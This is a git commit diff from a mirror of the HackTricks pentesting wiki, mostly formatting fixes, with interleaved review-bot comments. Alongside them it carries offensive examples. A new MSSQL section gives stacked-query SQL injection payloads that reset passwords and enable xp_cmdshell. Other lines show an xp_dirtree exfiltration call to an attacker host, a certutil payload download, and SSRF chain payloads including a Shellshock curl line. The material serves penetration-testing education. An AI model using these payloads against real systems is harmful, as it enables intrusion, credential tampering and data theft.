mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 06:00:40 +00:00
GITBOOK-4008: change request with no subject merged in GitBook
This commit is contained in:
parent
77f039bd0f
commit
f11b4d1856
11 changed files with 102 additions and 70 deletions
BIN
.gitbook/assets/image (12) (3).png
Normal file
Binary file not shown.
After Width: | Height: | Size: 28 KiB |
Binary file not shown.
Before Width: | Height: | Size: 28 KiB After Width: | Height: | Size: 9.2 KiB |
|
@ -322,7 +322,7 @@ certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil
|
|||
|
||||
**Detected by defender**
|
||||
|
||||
***
|
||||
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
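Review bot: the swapped-in `<figure>` has an empty `alt` and an empty `<figcaption>`, so the "Detected by defender" statement rests entirely on a screenshot that text mirrors and screen readers cannot see; add a caption stating what Defender flagged (the `certutil -urlcache` download named in the hunk header) so the point survives without the image. The same applies to the other figure swap in this commit.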
@ -211,7 +211,7 @@ MacOS Red Teaming is different from a regular Windows Red Teaming as usually **M
|
|||
|
||||
When a file is downloaded in Safari, if its a "safe" file, it will be **automatically opened**. So for example, if you **download a zip**, it will be automatically decompressed:
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (12).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (12) (3).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
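Review bot: the Safari sentence kept as context reads "if its a "safe" file" and should be "if it's a", and the replacement figure again ships with empty `alt`/`<figcaption>`. Since that paragraph is the only text explaining the auto-open behaviour, a caption naming the Safari preference that controls it ("Open 'safe' files after downloading", under General) would also hand readers the mitigation rather than only the screenshot.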
@ -7,8 +7,8 @@
|
|||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
|
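Review bot: the only change in the Twitter line is escaping the underscore in `hacktricks\_live` and bolding the surrounding words, but the bird-icon link beside it still points at `https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md`, a malformed target with a stray bracket and a second URL embedded in a repository path; point it at https://emojipedia.org/bird/ like the speech-balloon icon, or drop the icon link. This banner hunk is repeated verbatim in the other files of this commit and the same fix applies to each copy.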
@ -18,10 +18,9 @@
|
|||
|
||||
{% embed url="https://www.stmcyber.com/careers" %}
|
||||
|
||||
\
|
||||
\\
|
||||
|
||||
|
||||
****
|
||||
|
||||
**From**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\
|
||||
**APK**: [https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk](https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk)
|
||||
|
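Review bot: the lines between the `{% embed %}` and the **From** link still contain a bare `\`, a `\\` and a `****` on its own line; in CommonMark `\\` renders as a literal backslash and a lone `****` is a thematic break, so this hunk leaves a stray backslash and an unintended rule above the **From**/**APK** lines. Delete the three lines and leave a single blank line, or use the `***` rule the rest of the commit uses if a separator is intended.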
@ -131,8 +130,6 @@ Java.perform(function () {
|
|||
});
|
||||
```
|
||||
|
||||
|
||||
|
||||
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FwdlXOpyZOVGNzyhOiiFK%2Fimage%20(1).png?alt=media&token=13f4d279-7d3f-47ce-a68e-35f9a906973f" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||
|
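Review bot: the figure kept in this hunk loads from `https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/...image%20(1).png?alt=media&token=...`, a remote URL carrying an access token, while every other figure in this commit is a repo-local `../../.gitbook/assets/...` path; the remote copy breaks in the GitHub mirror and in PDF export, and the token ends up in page source. Copy the image into `.gitbook/assets/` and reference it relatively.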
@ -146,7 +143,7 @@ Java.perform(function () {
|
|||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -247,6 +247,7 @@ Launch some kind of **spider** inside the web. The goal of the spider is to **fi
|
|||
* [**waymore**](https://github.com/xnl-h4ck3r/waymore)**:** Discover links from the wayback machine (also downloading the responses in the wayback and looking for more links
|
||||
* [**HTTPLoot**](https://github.com/redhuntlabs/HTTPLoot) (go): Crawl (even by filling forms) and also find sensitive info using specific regexes.
|
||||
* [**SpiderSuite**](https://github.com/3nock/SpiderSuite): Spider Suite is an advance multi-feature GUI web security Crawler/Spider designed for cyber security professionals.
|
||||
* [**jsluice**](https://github.com/BishopFox/jsluice) (go): It's a Go package and [command-line tool](https://github.com/BishopFox/jsluice/blob/main/cmd/jsluice) for extracting URLs, paths, secrets, and other interesting data from JavaScript source code.
|
||||
|
||||
### Brute Force directories and files
|
||||
|
||||
|
|
|
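Review bot: the new jsluice entry is fine, but the waymore entry two lines above it never closes its parenthesis ("(also downloading the responses in the wayback and looking for more links"), and the SpiderSuite entry has "an advance multi-feature" for "an advanced multi-feature"; fix both while this list is being touched. For consistency with the HTTPLoot and jsluice lines, the `(go)` language tag could also be added where it applies.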
@ -183,7 +183,7 @@ To set the domain name of the server in the URL that the Referrer is going to se
|
|||
</html>
|
||||
```
|
||||
|
||||
***
|
||||
|
||||
|
||||
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -90,7 +90,7 @@ Other useful extensions:
|
|||
* Another technique to make a payload that **survives an image resizing**, using the PHP-GD function `thumbnailImage`. However, you could use the **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
|
||||
* [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen\_tEXt\_png.php)
|
||||
|
||||
***
|
||||
|
||||
|
||||
### Other Tricks to check
|
||||
|
||||
|
|
|
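Review bot: the bullet this hunk re-escapes has two wording problems. `thumbnailImage` is a method of PHP's Imagick extension (`Imagick::thumbnailImage`), not a PHP-GD function, so "the PHP-GD function `thumbnailImage`" should read "the Imagick method `thumbnailImage`". And "However, you could use the **tEXt chunk** technique" has nothing preceding it to contrast with; "Alternatively, the tEXt chunk technique ... inserts text that survives compression" reads correctly. The escaped `gen\_tEXt\_png.php` in the link target is harmless in CommonMark.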
@ -7,8 +7,8 @@
|
|||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
|
@ -16,7 +16,7 @@
|
|||
|
||||
It may be possible to **enumerate domain users via SQL injection inside a MSSQL** server using the following MSSQL functions:
|
||||
|
||||
* **`SELECT DEFAULT_DOMAIN()`**: Get current domain name. 
|
||||
* **`SELECT DEFAULT_DOMAIN()`**: Get current domain name.
|
||||
* **`master.dbo.fn_varbintohexstr(SUSER_SID('DOMAIN\Administrator'))`**: If you know the name of the domain (_DOMAIN_ in this example) this function will return the **SID of the user Administrator** in hex format. This will look like `0x01050000000[...]0000f401`, note how the **last 4 bytes** are the number **500** in **big endian** format, which is the **common ID of the user administrator**.\
|
||||
This function will allow you to **know the ID of the domain** (all the bytes except of the last 4).
|
||||
* **`SUSER_SNAME(0x01050000000[...]0000e803)`** : This function will return the **username of the ID indicated** (if any), in this case **0000e803** in big endian == **1000** (usually this is the ID of the first regular user ID created). Then you can imagine that you can brute-force user IDs from 1000 to 2000 and probably get all the usernames of the users of the domain. For example using a function like the following one:
|
||||
|
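Review bot: the SID explanation in the context lines has the byte order backwards. Sub-authorities in a binary SID are little-endian DWORDs, so RID 500 (0x1F4) is stored as the bytes `f4 01 00 00` and the string from `fn_varbintohexstr(SUSER_SID(...))` ends in `...f4010000`, not `...0000f401`, and "big endian" should be "little endian"; likewise RID 1000 (0x3E8) ends `...e8030000`, so the `SUSER_SNAME(0x01050000000[...]0000e803)` example should be written `...e8030000`. The whitespace-only change to the `SELECT DEFAULT_DOMAIN()` line is fine.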
@ -119,11 +119,11 @@ SELECT @user = (SELECT user);
|
|||
EXEC ('master..xp_dirtree "\\'+@user+'.attacker-server\aa"');
|
||||
```
|
||||
|
||||
Much like MySQL’s `LOAD_FILE`, you can use `xp_dirtree` to make a network request to **only TCP port 445**. You cannot control the port number, but can read information from network shares. 
|
||||
Much like MySQL’s `LOAD_FILE`, you can use `xp_dirtree` to make a network request to **only TCP port 445**. You cannot control the port number, but can read information from network shares.
|
||||
|
||||
**PS:** This does not work on `Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)` running on a `Windows Server 2016 Datacenter` in the default config.
|
||||
|
||||
There are **other** stored procedures **** [**like `master..xp_fileexist`**](https://social.technet.microsoft.com/wiki/contents/articles/40107.xp-fileexist-and-its-alternate.aspx) or **`xp_subdirs`** that can be used for similar results.
|
||||
There are **other** stored procedures \*\*\*\* [**like `master..xp_fileexist`**](https://social.technet.microsoft.com/wiki/contents/articles/40107.xp-fileexist-and-its-alternate.aspx) or **`xp_subdirs`** that can be used for similar results.
|
||||
|
||||
### `xp_cmdshell` <a href="#master-xp-cmdshell" id="master-xp-cmdshell"></a>
|
||||
|
||||
|
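Review bot: escaping the stray `****` to `\*\*\*\*` in the "There are **other** stored procedures" sentence makes four literal asterisks appear in the rendered text; the marker is an empty-bold leftover and should be deleted rather than escaped. The whitespace-only change to the `xp_dirtree` paragraph is fine, and the "**PS:** This does not work on `Microsoft SQL Server 2019 (RTM) - 15.0.2000.5`" caveat is worth keeping next to it.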
@ -232,16 +232,62 @@ A period instead of a whitespace between FROM and a column name:
|
|||
https://vuln.app/getItem?id=1+union+select+null,@@version,null+from.users--
|
||||
```
|
||||
|
||||
\N seperator between SELECT and a throwaway column:
|
||||
\N separator between SELECT and a throwaway column:
|
||||
|
||||
```
|
||||
https://vuln.app/getItem?id=0xunion+select\Nnull,@@version,null+from+users--
|
||||
```
|
||||
|
||||
### WAF Bypass with unorthodox stacked queries
|
||||
|
||||
According to [**this blog post**](https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/) it's possible to stack queries in MSSQL without using ";":
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (12).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
So for example, multiple quesries such as:
|
||||
|
||||
```sql
|
||||
use [tempdb]
|
||||
create table [test] ([id] int)
|
||||
insert [test] values(1)
|
||||
select [id] from [test]
|
||||
drop table[test]
|
||||
```
|
||||
|
||||
Can be reduced to:
|
||||
|
||||
```sql
|
||||
use[tempdb]create/**/table[test]([id]int)insert[test]values(1)select[id]from[test]drop/**/table[test]
|
||||
```
|
||||
|
||||
Therefore it could be possible to bypass different WAFs that doesn't consider this form of stacking queries. For example:
|
||||
|
||||
```
|
||||
# Adding a useless exec() at the end and making the WAF think this isn't a valid querie
|
||||
admina'union select 1,'admin','testtest123'exec('select 1')--
|
||||
## This will be:
|
||||
SELECT id, username, password FROM users WHERE username = 'admina'union select 1,'admin','testtest123'
|
||||
exec('select 1')--'
|
||||
|
||||
# Using weirdly built queries
|
||||
admin'exec('update[users]set[password]=''a''')--
|
||||
## This will be:
|
||||
SELECT id, username, password FROM users WHERE username = 'admin'
|
||||
exec('update[users]set[password]=''a''')--'
|
||||
|
||||
# Or enabling xp_cmdshell
|
||||
admin'exec('sp_configure''show advanced option'',''1''reconfigure')exec('sp_configure''xp_cmdshell'',''1''reconfigure')--
|
||||
## This will be
|
||||
select * from users where username = ' admin'
|
||||
exec('sp_configure''show advanced option'',''1''reconfigure')
|
||||
exec('sp_configure''xp_cmdshell'',''1''reconfigure')--
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
* [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
|
||||
* [https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#MSSQL](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#MSSQL)
|
||||
* [https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/](https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/)
|
||||
|
||||
<details>
|
||||
|
||||
|
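Review bot: in the new "WAF Bypass with unorthodox stacked queries" section, "multiple quesries" should be "queries", "WAFs that doesn't consider" should be "that don't consider", and "isn't a valid querie" should be "query". The fence after "For example:" has no language tag while the two fences before it use ```sql. In the last expansion, `select * from users where username = ' admin'` shows a space before `admin` that the injected input `admin'exec(...)` does not contain, and it switches away from the `SELECT id, username, password FROM users WHERE username = ...` shape used by the two expansions above it; align all three. The `\N seperator` → `separator` fix is good.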
@ -250,7 +296,7 @@ https://vuln.app/getItem?id=0xunion+select\Nnull,@@version,null+from+users--
|
|||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -7,7 +7,7 @@
|
|||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
@ -17,7 +17,7 @@
|
|||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
||||
***
|
||||
|
||||
|
||||
**This page aims to explain different tricks that could help you to exploit a SQLinjection found in a postgresql database and to compliment the tricks you can find on** [**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md)
|
||||
|
||||
|
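Review bot: the bold paragraph kept as context has "SQLinjection" (missing space) and "to compliment the tricks" should be "to complement"; this hunk only moves the `***` rule relative to the `{% embed %}`, so fix the wording while here.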
@ -117,7 +117,7 @@ SELECT $TAG$hacktricks$TAG$;
|
|||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,25 +1,20 @@
|
|||
|
||||
# SSRF Vulnerable Platforms
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
This section was copied from [https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/](https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/)
|
||||
|
||||
# Elasticsearch
|
||||
## Elasticsearch
|
||||
|
||||
**Commonly bound port: 9200**
|
||||
|
||||
|
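Review bot: swapping `-` for `*` list markers and demoting `# Elasticsearch` to `## Elasticsearch` leaves `# SSRF Vulnerable Platforms` as the single H1, which is the right structure. The `<summary>` line still has `</a> -<a href="https://twitter.com/hacktricks_live">` with the space missing before the Twitter link (compare the ` - <a` spacing before the Twitch and Youtube links). The "This section was copied from https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/" attribution above `## Elasticsearch` would read better as a blockquote or italic line so it is not mistaken for body text.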
@ -44,7 +39,7 @@ Note: the `_shutdown` API has been removed from Elasticsearch version 2.x. and u
|
|||
/_cluster/nodes/_all/_shutdown
|
||||
```
|
||||
|
||||
# Weblogic
|
||||
## Weblogic
|
||||
|
||||
**Commonly bound ports: 80, 443 (SSL), 7001, 8888**
|
||||
|
||||
|
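Review bot: the `# Weblogic` → `## Weblogic` demotion is the same fix as the Elasticsearch one and is repeated for every product heading in this file. While these headings are being touched, the "**Commonly bound ports: ...**" bold lines under each alternate between `80, 443 (SSL)` and `80,443 (SSL)` spacing and between "port" and "ports"; normalising them in the same commit would be cheap.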
@ -134,13 +129,13 @@ Content-Length: 117
|
|||
_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://SSRF_CANARY/poc.xml")
|
||||
```
|
||||
|
||||
# Hashicorp Consul
|
||||
## Hashicorp Consul
|
||||
|
||||
**Commonly bound ports: 8500, 8501 (SSL)**
|
||||
|
||||
Writeup can be found [here](https://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html).
|
||||
|
||||
# Shellshock
|
||||
## Shellshock
|
||||
|
||||
**Commonly bound ports: 80, 443 (SSL), 8080**
|
||||
|
||||
|
@ -156,7 +151,7 @@ Short list of CGI paths to test:
|
|||
User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ; curl SSRF_CANARY
|
||||
```
|
||||
|
||||
# Apache Druid
|
||||
## Apache Druid
|
||||
|
||||
**Commonly bound ports: 80, 8080, 8888, 8082**
|
||||
|
||||
|
@ -185,7 +180,7 @@ Shutdown supervisors on Apache Druid Overlords:
|
|||
/druid/indexer/v1/supervisor/{supervisorId}/shutdown
|
||||
```
|
||||
|
||||
# Apache Solr
|
||||
## Apache Solr
|
||||
|
||||
**Commonly bound port: 8983**
|
||||
|
||||
|
@ -217,7 +212,7 @@ Taken from [here](https://github.com/veracode-research/solr-injection).
|
|||
|
||||
[Research on RCE via dataImportHandler](https://github.com/veracode-research/solr-injection#3-cve-2019-0193-remote-code-execution-via-dataimporthandler)
|
||||
|
||||
# PeopleSoft
|
||||
## PeopleSoft
|
||||
|
||||
**Commonly bound ports: 80,443 (SSL)**
|
||||
|
||||
|
@ -272,7 +267,7 @@ Content-Type: application/xml
|
|||
<!DOCTYPE a PUBLIC "-//B/A/EN" "http://SSRF_CANARY">
|
||||
```
|
||||
|
||||
# Apache Struts
|
||||
## Apache Struts
|
||||
|
||||
**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
|
||||
|
||||
|
@ -286,7 +281,7 @@ Append this to the end of every internal endpoint/URL you know of:
|
|||
